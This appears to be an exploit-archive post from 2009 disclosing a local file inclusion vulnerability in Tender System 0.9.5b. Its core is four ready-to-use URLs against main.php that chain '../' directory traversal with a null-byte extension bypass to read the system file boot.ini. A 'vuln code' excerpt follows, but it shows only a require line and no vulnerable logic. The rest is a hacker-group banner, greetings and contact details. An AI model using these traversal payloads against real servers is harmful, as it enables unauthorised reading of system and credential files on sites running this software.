[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Tender System 0.9.5b LFI
# Published : 2009-12-14
# Author : Packetdeath
# Previous Title : mini Hosting Panel XSRF Change Admin Settings
# Next Title : WSCreator 1.1 Blind SQL Injection


__________                __           __      .___             __  .__     
  ______   _____    ____ |  | __ _____/  |_  __| _/____ _____ _/  |_|  |__  
   |     ___/__   _/ ___|  |/ // __    __/ __ |/ __ \__  \   __  |   
   |    |     / __ \  ___|    <  ___/|  | / /_/   ___/ / __ |  | |   Y  
   |____|    (____  /___  >__|_ \___  >__| ____ |___  >____  /__| |___|  /
                  /     /     /    /          /    /     /          / 
				  
-------------------------------------------------------------------------------------------
Note: TESTED LOCALLY WITH XAMPP FOR WINDOWS 
I was unable to get this to work on a Linux server. Further testing may be required.
 ------------------------------------------------------------------------------------------
Target: TenderSystem 
Version: 0.9.5 Beta
Site  http://www.tendersystem.com/
Demo: http://demo.tendersystem.com/
Date: 2-14-2009
-------------------------------------------------------------------------------------------
Author: Packetdeath
Homepage: www.ssteam.ws
Contact: yaii_abc@hotmail.com
-------------------------------------------------------------------------------------------
Greetz: bi0, AnnexxEmpire and the rest of SSTeam.ws
------------------------------------------------------------------------------------------- 

Exploit:
http://127.0.0.1/tendersystem/main.php?module=../../../../../../../../boot.ini%00.html&function=login



http://127.0.0.1/tendersystem/main.php?module=../../../../../../../../boot.ini%00.jpg&function=login



http://127.0.0.1/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.html


http://127.0.0.1/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.jpg
-------------------------------------------------------------------------------------------------------
Vuln code in main.php: 

// load required files
require('modules/generic/ts_main.php');
?>
-------------------------------------------------------------------------------------------------------

Some things are better left unsaid <3
... That is all.

/Packetdeath